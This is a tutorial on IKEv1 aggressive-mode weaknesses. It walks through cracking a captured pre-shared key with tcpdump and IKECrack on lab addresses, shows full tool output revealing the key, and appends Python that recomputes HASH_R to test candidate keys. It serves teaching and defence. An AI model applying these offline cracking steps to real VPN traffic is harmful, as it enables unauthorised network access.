An exploration of the Internet Key Exchange (IKE) version 1, IKE version 2, and the different modes in which it operates: aggressive, main and quick.
Another way to exploit aggressive mode is to passively capture packets instead of an active probe. It may be possible to see traffic that is part of an IKE exchange, but not actually contact the IKE responder due to firewalls or some sort of packet filter.
If the initial packets of an aggressive mode IKE exchange are captured, all of the information that is needed to calculate the responder's hash, except for the pre-shared-key, is sent in clear text: the nonces, the Diffie-Hellman-Merkle public values, the cookies, the identities and all of the algorithms to be used.
Paraphrasing the HASH generation method from RFC2409:
HASH generation parameters
For pre-shared keys: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)

SKEYID is a string derived from secret material known only to the active players in the exchange.

To authenticate either exchange the initiator of the protocol generates HASH_I and the responder generates HASH_R where:

    HASH_I = prf(SKEYID, g^xi | g^xr | CKY-I | CKY-R | SAi_b | IDii_b )
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b )

SAi_b is the entire body of the SA payload (minus the ISAKMP generic header), i.e. the DOI, situation, all proposals and all transforms offered by the Initiator.

CKY-I and CKY-R are the Initiator's cookie and the Responder's cookie, respectively, from the ISAKMP header.

g^xi and g^xr are the Diffie-Hellman ([DH]) public values of the initiator and responder respectively.

Nx is the nonce payload; x can be: i or r for the ISAKMP initiator and responder respectively.

IDx is the identification payload for "x". x can be: "ii" or "ir" for the ISAKMP initiator and responder respectively during phase one negotiation; or "ui" or "ur" for the user initiator and responder respectively during phase two.
Of all of the parameters listed above, SAi_b can be easily calculated from the ISAKMP packet contents. The cookie values CKY-I and CKY-R are sent in the clear, as are the Diffie-Hellman-Merkle public values g^xi and g^xr, the nonces Ni_b and Nr_b, and the identities IDii_b and IDir_b. SKEYID has to be guessed at, since the pre-shared-key isn't known to an eavesdropper. For each guess of SKEYID, calculated using the authentication algorithm in the transform set that was agreed upon, a guess can be made at the responder's HASH value, which is also sent in the clear. If the guess for the responder's HASH is the same as the one that was sent over the wire, we then know the value of the pre-shared-key.
IKECrack is a Perl script that takes all of the information available over the wire, and then launches a brute force or a dictionary attack against the pre-shared-key. IKECrack is a bit specific about the format it expects from the output of tcpdump. IKECrack wouldn't work with tcpdump version 4.4, but liked the way the output was formatted from tcpdump version 3.6.1 and ran fine afterwards. It's also really finicky about the capture file; several aggressive mode captures that I did didn't work, as the initiator couldn't be found or the responder's hash couldn't be located. However, the IKEv1-aggressive-dynamic.pcap file was able to be parsed correctly.
We'll do a short walkthrough, using the IKEv1 aggressive mode capture previously referenced between SRX-11 and SRX-13. We'll then use IKECrack to figure out what the preshared key is.
First we need to reparse the output of the capture into the format that IKEcrack wants, with the version of tcpdump it likes. IKEcrack expects a hex formatted pcap file using the flags xq from tcpdump.
IKEcrack suitable output from capture file
root@attacker:~# tcpdump-3.6.1 -nxqr IKEv1-aggressive-dynamic.pcap
The output needs to be saved in a file called logfile.dat.
creating logfile.dat for IKEcrack
root@attacker:~# tcpdump-3.6.1 -nxqr IKEv1-aggressive-dynamic.pcap > logfile.dat
Next, IKEcrack can be run on the dump file. It needs the IP address and IKE port of the initiator fed in as an argument in the format <Initiator IP Address>.<Initiator Port>. You'll notice that this is the same format as in the output of the hexified tcpdump.
Running IKEcrack in bruteforce mode
root@attacker:~# ikecrack-snarf-1.00.pl 192.168.11.11.500
Looking for Initiator : 192.168.11.11.500
Header IPs 192.168.11.11.500 192.168.13.13.500:
Matching Header 192.168.11.11.500 192.168.13.13.500
Init tcookie_i : a6fe2f1566318a1f
tcookie_r : 0000000000000000
xchg type: 04
Aggressive Mode - Continue
SA_i : 00000001000000010000003401010801a6fe2f1566318a1f0000002400010000800100018004000180020001800b0001000c00040001518080030001
KE_i : 15d73dd0aef17090dfe2c662e5d0cc64a7845de31ec828d620683f6db11fc5b95e5f77562acb24bec86d4fe3cef0d8b7b7be527e80dc6631ed3f29a6b0c502439d78ca1d7a49b065978664c1909489f9da1528d09a31605e8311ccd59870db8c
nonce_i : 84b450023c24d0c3093f3bd7a30ae11f
ID_i : 020000007372783131
Header IPs 192.168.13.13.500 192.168.11.11.500:
Reply Header? 192.168.13.13.500 192.168.11.11.500
Resp tcookie_i : a6fe2f1566318a1f
tcookie_r : 690eec1a227bba74
xchg type: 04
Aggressive Mode - Continue
SA_r : 00000001000000010000002c010100010000002400010000800100018004000180020001800b0001000c00040001518080030001
KE_r : 9c5342751edf1d432e747e759d560b57349803574e631c50953ba171b0b8693bb1347d790c8299480e75f807c9b22b13f20bde055047468b027d874b54cda1fe0dcc94e5467bb96ec99ae83697a982f6e29ee63875da74eba80db9cfe3e8e188
nonce_r : 5e857dab0671efcad3cf4040892bf5e4
ID_r : 01000000c0a80d0d
HASH_r : 652e08ef95c3931f61cc68c25a0d321d
Header IPs 192.168.11.11.500 192.168.13.13.500:
Header IPs 192.168.11.11.500 192.168.13.13.500:
Header IPs 192.168.13.13.500 192.168.11.11.500:
Header IPs 192.168.11.11.500 192.168.13.13.500:
Initiator_ID - Type unknown:
Responder_ID - Type is IPv4: 192.168.13.13
Responder Sent MD5 HASH_R : 652e08ef95c3931f61cc68c25a0d321d
Starting Grinder.............
No dictionary file found - skipping to bruteforce
Hint: create the file "wordlist" for a dictionary attack
Starting Bruteforce Attack:
Character Set: a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Character 1 Done : Time 0 seconds
Character 2 Done : Time 0 seconds
Character 3 Done : Time 2 seconds
Character 4 Done : Time 77 seconds
As bruteforcing can take quite a while, especially since our IKE password has 8 characters, we'll use a dictionary file instead. This dictionary needs to be called wordlist. IKEcrack doesn't do any fancy transformations or substitutions with the wordlist, so the dictionary needs to contain the exact password (or a collision if you can find one). If the file wordlist exists, IKEcrack will run in dictionary mode.
IKEcrack running with a dictionary
root@attacker:~# ikecrack-snarf-1.00.pl 192.168.11.11.500
Looking for Initiator : 192.168.11.11.500
Header IPs 192.168.11.11.500 192.168.13.13.500:
Matching Header 192.168.11.11.500 192.168.13.13.500
Init tcookie_i : a6fe2f1566318a1f
tcookie_r : 0000000000000000
xchg type: 04
Aggressive Mode - Continue
SA_i : 00000001000000010000003401010801a6fe2f1566318a1f0000002400010000800100018004000180020001800b0001000c00040001518080030001
KE_i : 15d73dd0aef17090dfe2c662e5d0cc64a7845de31ec828d620683f6db11fc5b95e5f77562acb24bec86d4fe3cef0d8b7b7be527e80dc6631ed3f29a6b0c502439d78ca1d7a49b065978664c1909489f9da1528d09a31605e8311ccd59870db8c
nonce_i : 84b450023c24d0c3093f3bd7a30ae11f
ID_i : 020000007372783131
Header IPs 192.168.13.13.500 192.168.11.11.500:
Reply Header? 192.168.13.13.500 192.168.11.11.500
Resp tcookie_i : a6fe2f1566318a1f
tcookie_r : 690eec1a227bba74
xchg type: 04
Aggressive Mode - Continue
SA_r : 00000001000000010000002c010100010000002400010000800100018004000180020001800b0001000c00040001518080030001
KE_r : 9c5342751edf1d432e747e759d560b57349803574e631c50953ba171b0b8693bb1347d790c8299480e75f807c9b22b13f20bde055047468b027d874b54cda1fe0dcc94e5467bb96ec99ae83697a982f6e29ee63875da74eba80db9cfe3e8e188
nonce_r : 5e857dab0671efcad3cf4040892bf5e4
ID_r : 01000000c0a80d0d
HASH_r : 652e08ef95c3931f61cc68c25a0d321d
Header IPs 192.168.11.11.500 192.168.13.13.500:
Header IPs 192.168.11.11.500 192.168.13.13.500:
Header IPs 192.168.13.13.500 192.168.11.11.500:
Header IPs 192.168.11.11.500 192.168.13.13.500:
Initiator_ID - Type unknown:
Responder_ID - Type is IPv4: 192.168.13.13
Responder Sent MD5 HASH_R : 652e08ef95c3931f61cc68c25a0d321d
Starting Grinder.............
Reading Dictionary File
Starting Dictionary Attack:
match with juniper123
Calc MD5 HASH_R : 652e08ef95c3931f61cc68c25a0d321d
Calc SKEYID : 93ea4474072b5f5cd711002394d1e41a
root@attacker:~#
And we have the password! I cheated a bit on this one as I added the actual password onto the end of the dictionary I was using.
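The comparison described above, written out from the RFC 2409 formulas with the cleartext fields IKEcrack printed for this capture, shows that the pre-shared key is the only input an eavesdropper lacks. This is an added example, not IKEcrack's code or part of the original walkthrough; the function names and the CAPTURE dictionary are assumptions made here, and HMAC-MD5 is used as the prf because the capture negotiates MD5.

```python
import hashlib
import hmac

def prf(key: bytes, data: bytes) -> bytes:
    # The transform set in this capture negotiates MD5, so the prf is HMAC-MD5.
    return hmac.new(key, data, hashlib.md5).digest()

def skeyid(psk: bytes, x: dict) -> bytes:
    # SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
    return prf(psk, x["Ni_b"] + x["Nr_b"])

def hash_r(psk: bytes, x: dict) -> bytes:
    # HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    data = (x["g_xr"] + x["g_xi"] + x["CKY_R"] + x["CKY_I"]
            + x["SAi_b"] + x["IDir_b"])
    return prf(skeyid(psk, x), data)

def psk_matches(candidate: bytes, x: dict, wire_hash_r: bytes) -> bool:
    # Compare the recomputed HASH_R with the one captured on the wire.
    return hmac.compare_digest(hash_r(candidate, x), wire_hash_r)

# Cleartext fields as IKEcrack printed them from the capture on this page
# (dictionary key names are this example's own).
CAPTURE = {name: bytes.fromhex(value) for name, value in {
    "CKY_I": "a6fe2f1566318a1f",
    "CKY_R": "690eec1a227bba74",
    "SAi_b": "00000001000000010000003401010801a6fe2f1566318a1f0000002400010000800100018004000180020001800b0001000c00040001518080030001",
    "g_xi": "15d73dd0aef17090dfe2c662e5d0cc64a7845de31ec828d620683f6db11fc5b95e5f77562acb24bec86d4fe3cef0d8b7b7be527e80dc6631ed3f29a6b0c502439d78ca1d7a49b065978664c1909489f9da1528d09a31605e8311ccd59870db8c",
    "g_xr": "9c5342751edf1d432e747e759d560b57349803574e631c50953ba171b0b8693bb1347d790c8299480e75f807c9b22b13f20bde055047468b027d874b54cda1fe0dcc94e5467bb96ec99ae83697a982f6e29ee63875da74eba80db9cfe3e8e188",
    "Ni_b": "84b450023c24d0c3093f3bd7a30ae11f",
    "Nr_b": "5e857dab0671efcad3cf4040892bf5e4",
    "IDir_b": "01000000c0a80d0d",
}.items()}
WIRE_HASH_R = bytes.fromhex("652e08ef95c3931f61cc68c25a0d321d")

if __name__ == "__main__":
    key = b"juniper123"  # the key IKEcrack reported on this page
    print("SKEYID :", skeyid(key, CAPTURE).hex())
    print("HASH_R :", hash_r(key, CAPTURE).hex())
    print("matches wire HASH_R:", psk_matches(key, CAPTURE, WIRE_HASH_R))
```

Run as a script, it prints the recomputed SKEYID and HASH_R so they can be compared with the "Calc SKEYID" and "Calc MD5 HASH_R" lines in the IKEcrack output.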